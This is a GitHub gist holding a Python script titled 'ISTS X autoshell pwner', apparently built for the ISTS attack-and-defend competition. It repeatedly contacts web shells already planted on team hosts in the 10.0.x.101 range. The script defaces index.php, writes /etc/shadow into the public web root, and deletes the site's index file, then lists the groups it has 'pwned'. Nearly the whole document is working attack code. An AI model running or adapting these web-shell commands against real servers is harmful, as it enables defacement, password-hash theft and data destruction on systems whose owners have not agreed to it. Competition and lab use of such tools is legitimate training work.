Skip to content

Instantly share code, notes, and snippets.

@antitree

antitree/gist:5237253

Created March 25, 2013 13:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save antitree/5237253 to your computer and use it in GitHub Desktop.
Save antitree/5237253 to your computer and use it in GitHub Desktop.
Download ZIP
ISTS X autoshell pwner
Raw
gistfile1.txt
import requests
import time
from optparse import OptionParser
timeout = 5
parser = OptionParser()
parser.add_option("-x", dest="host",
help="Choose an individual host to test")
(options, args) = parser.parse_args()
print(options.host)
def c99(group):
try:
r = requests.get("http://10.0." + str(group) + ".101/shell.php?act=cmd&cmd=echo+%22balls%22+%3E+%2Fvar%2Fwww%2Findex.php&d=%2Fusr%2Flib%2Fcgi-bin%2F&submit=Execute&cmd_txt=1")
print(r.text())
if r.status_code == 200:
cresult=1
print(cresult)
else: cresult=2
except:
cresult=3
return cresult
def shell(group):
try:
#r = requests.get("http://10.0." + str(group) + ".101/seashell.png?command=cat /etc/shadow>/var/www/index.php", timeout=timeout)
r = requests.get('http://10.0.' + str(group) + '.101/seashell.png?command=cat%20/etc/shadow>/var/www/index.htm', timeout=timeout)
r = requests.get('http://10.0.' + str(group) + '.101/seashell.png?command=rm%20/var/www/index.php', timeout=timeout)
if r.status_code == 200:
sresult= 1
print(sresult)
else:
sresult = 2
except:
sresult = 3
return sresult
if options.host:
print(c99(options.host))
print(shell(options.host))
else:
while True:
result = []
for group in range(200,213):
print("Trying c99 on %s" % group)
if (c99(group)) == 1:
result.append(group)
print("Trying shell method %s" % group)
if shell(group) == 1:
result.append(group)
print("----")
print("XXXXXXXXXXXXXXXXXXXXXXX")
print("XXX GROUPS PWND XXX")
for x in result:
print(x)
print(".... Waiting ....")
time.sleep(60)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment